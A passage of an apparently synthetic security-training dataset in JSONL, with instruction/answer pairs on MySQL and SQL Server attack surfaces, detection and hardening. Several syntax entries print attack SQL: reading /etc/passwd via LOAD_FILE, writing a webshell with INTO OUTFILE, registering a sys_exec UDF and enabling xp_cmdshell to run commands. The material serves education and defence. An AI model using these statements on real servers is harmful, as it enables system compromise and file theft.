mysql_secure_installation addresses common issues but is often skipped.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120392Z", "updated_at": "2025-12-17T19:35:42.120392Z"} +{"id": "trtp-18199984cc4f", "instruction": "What is the syntax for MySQL Default Accounts and Authentication?", "output": "Example of MySQL Default Accounts and Authentication:\n\n```sql\n-- Check for passwordless root:\nSELECT user, host, authentication_string FROM mysql.user WHERE user='root';\n\n-- Remove anonymous users:\nDELETE FROM mysql.user WHERE user='';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120402Z", "updated_at": "2025-12-17T19:35:42.120402Z"} +{"id": "trtp-d2bacb402092", "instruction": "Describe MySQL FILE Privilege Abuse and its role in database security.", "output": "The FILE privilege allows reading and writing files on the server filesystem. Attackers with FILE privilege can read sensitive files like /etc/passwd or write webshells to web directories.\n\nSecurity Relevance: FILE privilege enables filesystem access through SQL. Combined with SQL injection, attackers can read configuration files, source code, and write backdoors. 
It's one of the most dangerous MySQL privileges.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.122969Z", "updated_at": "2025-12-17T19:35:42.122969Z"} +{"id": "trtp-4d53c56dd49f", "instruction": "What elements make up MySQL FILE Privilege Abuse?", "output": "MySQL FILE Privilege Abuse consists of the following key components:\n\n- LOAD_FILE() function\n- INTO OUTFILE/DUMPFILE\n- secure_file_priv variable\n- FILE privilege grant\n- OS file permissions interaction", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.122989Z", "updated_at": "2025-12-17T19:35:42.122989Z"} +{"id": "trtp-2ebf862ae5d4", "instruction": "From a security perspective, why should defenders understand MySQL FILE Privilege Abuse?", "output": "FILE privilege enables filesystem access through SQL. Combined with SQL injection, attackers can read configuration files, source code, and write backdoors. 
It's one of the most dangerous MySQL privileges.\n\nCommon attack vectors include:\n- Read /etc/passwd for user enumeration\n- Read application config files for credentials\n- Write webshell to web directory\n- Read MySQL data files directly", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123004Z", "updated_at": "2025-12-17T19:35:42.123004Z"} +{"id": "trtp-9cd3ae07168e", "instruction": "What are common attack techniques involving MySQL FILE Privilege Abuse?", "output": "Attack techniques involving MySQL FILE Privilege Abuse:\n\n- Read /etc/passwd for user enumeration\n- Read application config files for credentials\n- Write webshell to web directory\n- Read MySQL data files directly\n\nDefenders can detect these attacks by:\n- LOAD_FILE() calls in query logs\n- INTO OUTFILE/DUMPFILE usage\n- File creation in unusual directories", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123018Z", "updated_at": "2025-12-17T19:35:42.123018Z"} +{"id": "trtp-8049accb3011", "instruction": "What log entries indicate MySQL FILE Privilege Abuse attacks?", "output": "Methods for detecting MySQL FILE Privilege Abuse attacks or anomalies:\n\n- LOAD_FILE() calls in query logs\n- INTO 
OUTFILE/DUMPFILE usage\n- File creation in unusual directories\n- Unexpected file reads in audit logs", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123029Z", "updated_at": "2025-12-17T19:35:42.123029Z"} +{"id": "trtp-a6f9b37fb84f", "instruction": "What are best practices for preventing MySQL FILE Privilege Abuse?", "output": "Security controls and preventive measures for MySQL FILE Privilege Abuse:\n\n- Set secure_file_priv to restrict paths\n- Never grant FILE privilege to application accounts\n- Use AppArmor/SELinux to restrict MySQL file access\n- Monitor for FILE privilege usage\n\nFILE privilege enables filesystem access through SQL. Combined with SQL injection, attackers can read configuration files, source code, and write backdoors. 
It's one of the most dangerous MySQL privileges.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123056Z", "updated_at": "2025-12-17T19:35:42.123056Z"} +{"id": "trtp-5021c9f9d2fb", "instruction": "What does MySQL FILE Privilege Abuse look like in SQL?", "output": "Example of MySQL FILE Privilege Abuse:\n\n```sql\n-- Read file:\nSELECT LOAD_FILE('/etc/passwd');\n\n-- Write webshell:\nSELECT '' INTO OUTFILE '/var/www/html/shell.php';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123066Z", "updated_at": "2025-12-17T19:35:42.123066Z"} +{"id": "trtp-ba33fff23278", "instruction": "Describe MySQL User-Defined Functions (UDF) and its role in database security.", "output": "MySQL UDFs allow loading shared libraries to extend functionality. Malicious UDFs can execute system commands, providing operating system access through SQL queries. UDF exploitation is a common privilege escalation technique.\n\nSecurity Relevance: UDF exploitation provides OS command execution through MySQL. Attackers upload malicious shared libraries and register them as functions. 
With SQL injection and FILE privilege, this leads to full server compromise.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125575Z", "updated_at": "2025-12-17T19:35:42.125575Z"} +{"id": "trtp-29503d566695", "instruction": "What are the main parts of MySQL User-Defined Functions (UDF) that security teams should understand?", "output": "MySQL User-Defined Functions (UDF) consists of the following key components:\n\n- lib_mysqludf_sys library\n- CREATE FUNCTION for UDF registration\n- plugin_dir directory\n- sys_exec() function\n- Shared library loading", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125596Z", "updated_at": "2025-12-17T19:35:42.125596Z"} +{"id": "trtp-80ed5fca9e7b", "instruction": "From a security perspective, why should defenders understand MySQL User-Defined Functions (UDF)?", "output": "UDF exploitation provides OS command execution through MySQL. Attackers upload malicious shared libraries and register them as functions. 
With SQL injection and FILE privilege, this leads to full server compromise.\n\nCommon attack vectors include:\n- Upload UDF library via INTO DUMPFILE\n- Register sys_exec function\n- Execute arbitrary OS commands\n- Establish reverse shell", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125610Z", "updated_at": "2025-12-17T19:35:42.125610Z"} +{"id": "trtp-fd0af9ca6790", "instruction": "What threats are associated with MySQL User-Defined Functions (UDF)?", "output": "Attack techniques involving MySQL User-Defined Functions (UDF):\n\n- Upload UDF library via INTO DUMPFILE\n- Register sys_exec function\n- Execute arbitrary OS commands\n- Establish reverse shell\n\nDefenders can detect these attacks by:\n- CREATE FUNCTION statements\n- Files in plugin_dir\n- sys_exec or similar function calls", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125624Z", "updated_at": "2025-12-17T19:35:42.125624Z"} +{"id": "trtp-4b213be3a948", "instruction": "How do you detect exploitation of MySQL User-Defined Functions (UDF)?", "output": "Methods for detecting MySQL User-Defined Functions (UDF) attacks or anomalies:\n\n- CREATE FUNCTION statements\n- Files in plugin_dir\n- 
sys_exec or similar function calls\n- Unusual process spawning from mysqld", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125635Z", "updated_at": "2025-12-17T19:35:42.125635Z"} +{"id": "trtp-880e3a6a48e6", "instruction": "How do you defend against MySQL User-Defined Functions (UDF) attacks?", "output": "Security controls and preventive measures for MySQL User-Defined Functions (UDF):\n\n- Restrict plugin_dir permissions\n- Don't grant FILE privilege\n- Monitor for UDF creation\n- Use AppArmor to restrict mysqld\n\nUDF exploitation provides OS command execution through MySQL. Attackers upload malicious shared libraries and register them as functions. 
With SQL injection and FILE privilege, this leads to full server compromise.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125648Z", "updated_at": "2025-12-17T19:35:42.125648Z"} +{"id": "trtp-ae3c9c043b7a", "instruction": "Provide a code example for MySQL User-Defined Functions (UDF).", "output": "Example of MySQL User-Defined Functions (UDF):\n\n```sql\n-- Create malicious UDF:\nCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';\n\n-- Execute command:\nSELECT sys_exec('id > /tmp/pwned.txt');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125659Z", "updated_at": "2025-12-17T19:35:42.125659Z"} +{"id": "trtp-7d14cdb9d002", "instruction": "What is MySQL Information Schema Enumeration and why is it important for database security?", "output": "MySQL's information_schema database contains metadata about all databases, tables, columns, and privileges. Attackers use this for reconnaissance during SQL injection to map the database structure.\n\nSecurity Relevance: Information_schema enables attackers to enumerate the entire database structure without guessing. 
It reveals table names, column names, and data types - essential for crafting effective injection payloads.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127414Z", "updated_at": "2025-12-17T19:35:42.127414Z"} +{"id": "trtp-787d288c103a", "instruction": "What elements make up MySQL Information Schema Enumeration?", "output": "MySQL Information Schema Enumeration consists of the following key components:\n\n- information_schema.tables\n- information_schema.columns\n- information_schema.schemata\n- information_schema.user_privileges\n- information_schema.processlist", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127434Z", "updated_at": "2025-12-17T19:35:42.127434Z"} +{"id": "trtp-2e17ab9f8264", "instruction": "Why is MySQL Information Schema Enumeration important for database security?", "output": "Information_schema enables attackers to enumerate the entire database structure without guessing. 
It reveals table names, column names, and data types - essential for crafting effective injection payloads.\n\nCommon attack vectors include:\n- UNION SELECT from information_schema\n- Database enumeration via schemata\n- Table discovery via tables\n- Column enumeration for injection crafting", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127448Z", "updated_at": "2025-12-17T19:35:42.127448Z"} +{"id": "trtp-14a1a707627e", "instruction": "How can adversaries exploit MySQL Information Schema Enumeration?", "output": "Attack techniques involving MySQL Information Schema Enumeration:\n\n- UNION SELECT from information_schema\n- Database enumeration via schemata\n- Table discovery via tables\n- Column enumeration for injection crafting\n\nDefenders can detect these attacks by:\n- Queries against information_schema\n- Multiple schema enumeration queries\n- Unusual metadata access patterns", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127463Z", "updated_at": "2025-12-17T19:35:42.127463Z"} +{"id": "trtp-1410a79242ec", "instruction": "What should analysts look for when monitoring for MySQL Information Schema Enumeration?", "output": "Methods for 
detecting MySQL Information Schema Enumeration attacks or anomalies:\n\n- Queries against information_schema\n- Multiple schema enumeration queries\n- Unusual metadata access patterns\n- information_schema in injection payloads", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127484Z", "updated_at": "2025-12-17T19:35:42.127484Z"} +{"id": "trtp-e44981be6dc7", "instruction": "What preventive measures address MySQL Information Schema Enumeration vulnerabilities?", "output": "Security controls and preventive measures for MySQL Information Schema Enumeration:\n\n- Limit information_schema access where possible\n- Monitor for enumeration patterns\n- Parameterized queries prevent injection\n- Consider column-level permissions\n\nInformation_schema enables attackers to enumerate the entire database structure without guessing. 
It reveals table names, column names, and data types - essential for crafting effective injection payloads.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127498Z", "updated_at": "2025-12-17T19:35:42.127498Z"} +{"id": "trtp-830d9640edea", "instruction": "What is the syntax for MySQL Information Schema Enumeration?", "output": "Example of MySQL Information Schema Enumeration:\n\n```sql\n-- List databases:\nSELECT schema_name FROM information_schema.schemata;\n\n-- List tables:\nSELECT table_name FROM information_schema.tables WHERE table_schema='target_db';\n\n-- List columns:\nSELECT column_name, data_type FROM information_schema.columns WHERE table_name='users';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127508Z", "updated_at": "2025-12-17T19:35:42.127508Z"} +{"id": "trtp-89cc4e21c119", "instruction": "Describe MySQL Binary Logging and Replication Security and its role in database security.", "output": "MySQL binary logs record all data modifications and are used for replication and point-in-time recovery. Binary logs may contain sensitive data including passwords. 
Replication involves privileged connections between servers.\n\nSecurity Relevance: Binary logs may expose sensitive data to anyone with file access. Replication credentials are high-value targets. Compromising replication can lead to data manipulation across multiple servers.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129221Z", "updated_at": "2025-12-17T19:35:42.129221Z"} +{"id": "trtp-605cb6acb124", "instruction": "What are the main parts of MySQL Binary Logging and Replication Security that security teams should understand?", "output": "MySQL Binary Logging and Replication Security consists of the following key components:\n\n- Binary log files\n- REPLICATION SLAVE privilege\n- Master-slave connections\n- binlog_format settings\n- mysqlbinlog utility", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129240Z", "updated_at": "2025-12-17T19:35:42.129240Z"} +{"id": "trtp-613e80415b4e", "instruction": "Why is MySQL Binary Logging and Replication Security important for database security?", "output": "Binary logs may expose sensitive data to anyone with file access. Replication credentials are high-value targets. 
Compromising replication can lead to data manipulation across multiple servers.\n\nCommon attack vectors include:\n- Binary log file access for credential theft\n- Replication credential compromise\n- Injecting malicious statements via replication\n- Data theft through binary log parsing", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129255Z", "updated_at": "2025-12-17T19:35:42.129255Z"} +{"id": "trtp-9153becf5b67", "instruction": "How do attackers abuse MySQL Binary Logging and Replication Security?", "output": "Attack techniques involving MySQL Binary Logging and Replication Security:\n\n- Binary log file access for credential theft\n- Replication credential compromise\n- Injecting malicious statements via replication\n- Data theft through binary log parsing\n\nDefenders can detect these attacks by:\n- Binary log file access outside normal operations\n- Unauthorized replication connections\n- binlog configuration changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129269Z", "updated_at": "2025-12-17T19:35:42.129269Z"} +{"id": "trtp-a6bda963c3e1", "instruction": "What indicators reveal malicious activity involving MySQL 
Binary Logging and Replication Security?", "output": "Methods for detecting MySQL Binary Logging and Replication Security attacks or anomalies:\n\n- Binary log file access outside normal operations\n- Unauthorized replication connections\n- binlog configuration changes\n- mysqlbinlog execution", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129280Z", "updated_at": "2025-12-17T19:35:42.129280Z"} +{"id": "trtp-1422a8e2ad01", "instruction": "What preventive measures address MySQL Binary Logging and Replication Security vulnerabilities?", "output": "Security controls and preventive measures for MySQL Binary Logging and Replication Security:\n\n- Secure binary log file permissions\n- Encrypt replication connections (SSL)\n- Strong replication passwords\n- Limit REPLICATION privilege\n\nBinary logs may expose sensitive data to anyone with file access. Replication credentials are high-value targets. 
Compromising replication can lead to data manipulation across multiple servers.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129292Z", "updated_at": "2025-12-17T19:35:42.129292Z"} +{"id": "trtp-a5a71d77e448", "instruction": "What is the syntax for MySQL Binary Logging and Replication Security?", "output": "Example of MySQL Binary Logging and Replication Security:\n\n```sql\n-- View binary log events:\nSHOW BINARY LOGS;\nSHOW BINLOG EVENTS IN 'mysql-bin.000001';\n\n-- Parse binary log:\nmysqlbinlog mysql-bin.000001\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129302Z", "updated_at": "2025-12-17T19:35:42.129302Z"} +{"id": "trtp-e318099dba19", "instruction": "What is SQL Server xp_cmdshell and why is it important for database security?", "output": "xp_cmdshell is a SQL Server extended stored procedure that executes operating system commands. It's the most direct path from SQL injection to OS command execution in MSSQL environments.\n\nSecurity Relevance: xp_cmdshell provides direct OS command execution through SQL. Attackers with sufficient privileges can enable it if disabled, then execute arbitrary commands. 
It's a critical attack vector in SQL injection.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131152Z", "updated_at": "2025-12-17T19:35:42.131152Z"} +{"id": "trtp-72b6bc020db5", "instruction": "What elements make up SQL Server xp_cmdshell?", "output": "SQL Server xp_cmdshell consists of the following key components:\n\n- xp_cmdshell extended procedure\n- sp_configure for enabling\n- CONTROL SERVER permission\n- Command output capture\n- show advanced options setting", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131171Z", "updated_at": "2025-12-17T19:35:42.131171Z"} +{"id": "trtp-8154e64c9f13", "instruction": "Why is SQL Server xp_cmdshell important for database security?", "output": "xp_cmdshell provides direct OS command execution through SQL. Attackers with sufficient privileges can enable it if disabled, then execute arbitrary commands. 
It's a critical attack vector in SQL injection.\n\nCommon attack vectors include:\n- Enable and execute OS commands\n- Establish reverse shells\n- Download and execute malware\n- Access network resources", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131186Z", "updated_at": "2025-12-17T19:35:42.131186Z"} +{"id": "trtp-e8bf181f2915", "instruction": "What attacks exploit SQL Server xp_cmdshell?", "output": "Attack techniques involving SQL Server xp_cmdshell:\n\n- Enable and execute OS commands\n- Establish reverse shells\n- Download and execute malware\n- Access network resources\n\nDefenders can detect these attacks by:\n- sp_configure changes for xp_cmdshell\n- xp_cmdshell execution events\n- Unusual process spawning from sqlservr.exe", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131199Z", "updated_at": "2025-12-17T19:35:42.131199Z"} +{"id": "trtp-391736a4e15f", "instruction": "What should analysts look for when monitoring for SQL Server xp_cmdshell?", "output": "Methods for detecting SQL Server xp_cmdshell attacks or anomalies:\n\n- sp_configure changes for xp_cmdshell\n- xp_cmdshell execution events\n- Unusual process spawning from sqlservr.exe\n- Command execution 
audit events", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131210Z", "updated_at": "2025-12-17T19:35:42.131210Z"} +{"id": "trtp-08a75e77773d", "instruction": "What security controls mitigate SQL Server xp_cmdshell risks?", "output": "Security controls and preventive measures for SQL Server xp_cmdshell:\n\n- Keep xp_cmdshell disabled\n- Alert on sp_configure changes\n- Restrict CONTROL SERVER permission\n- Monitor for enablement attempts\n\nxp_cmdshell provides direct OS command execution through SQL. Attackers with sufficient privileges can enable it if disabled, then execute arbitrary commands. It's a critical attack vector in SQL injection.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131222Z", "updated_at": "2025-12-17T19:35:42.131222Z"} +{"id": "trtp-49b6cd2d2d1e", "instruction": "What does SQL Server xp_cmdshell look like in SQL?", "output": "Example of SQL Server xp_cmdshell:\n\n```sql\n-- Enable xp_cmdshell:\nEXEC sp_configure 'show advanced options', 1;\nRECONFIGURE;\nEXEC sp_configure 'xp_cmdshell', 1;\nRECONFIGURE;\n\n-- Execute command:\nEXEC xp_cmdshell 'whoami';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", 
"source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131233Z", "updated_at": "2025-12-17T19:35:42.131233Z"} +{"id": "trtp-3a9907fc4a89", "instruction": "How does SQL Server OPENROWSET and OPENDATASOURCE work and what are its security implications?", "output": "OPENROWSET and OPENDATASOURCE enable ad-hoc remote data access in SQL Server. Attackers abuse these to exfiltrate data, connect to external servers, or access local files including password hashes.\n\nSecurity Relevance: These functions enable data exfiltration and file access without xp_cmdshell. OPENROWSET with BULK can read local files. Remote connections can be used to relay attacks or capture credentials.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, 